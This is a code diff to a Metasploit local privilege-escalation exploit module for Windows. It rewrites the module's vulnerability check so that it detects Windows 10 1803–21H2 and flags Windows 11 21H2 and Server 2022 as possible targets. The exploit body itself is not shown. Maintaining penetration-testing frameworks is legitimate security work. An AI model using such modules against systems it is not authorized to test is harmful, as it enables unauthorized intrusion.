@@ -47,7 +47,6 @@ class MetasploitModule < Msf::Exploit::Local
             # Metasploit exploit
             'Spencer McIntyre' # metasploit module
           ],
-          'Arch' => [ ARCH_X64 ],
           'Platform' => 'win',
           'SessionTypes' => [ 'meterpreter' ],
           'DefaultOptions' => {
@@ -89,22 +88,21 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    sysinfo_value = sysinfo['OS']
-
-    if sysinfo_value !~ /windows/i
+    if session.platform != 'windows'
       # Non-Windows systems are definitely not affected.
       return Exploit::CheckCode::Safe
     end
 
-    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
-    vprint_status("Windows Build Number = #{build_num}")
-
-    unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044)
-      print_error('The exploit only supports Windows 10 versions 1803 - 21H2')
+    version = get_version_info
+    vprint_status("Windows Build Number = #{version.product_name}")
+    if version.build_number.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_21H2)
+      CheckCode::Appears
+    elsif version.build_number == Msf::WindowsVersion::Server2022 || version.build_number == Msf::WindowsVersion::Win11_21H2
+      CheckCode::Detected("May be vulnerable, but exploit not tested on #{version.product_name}")
+    else
+      print_error('Vulnerability only present on Windows 10 versions 1803 - 21H2, Windows 11 21H2, Server 2019 and Server 2022')
       return CheckCode::Safe
     end
-
-    CheckCode::Appears
   end
 
   def exploit
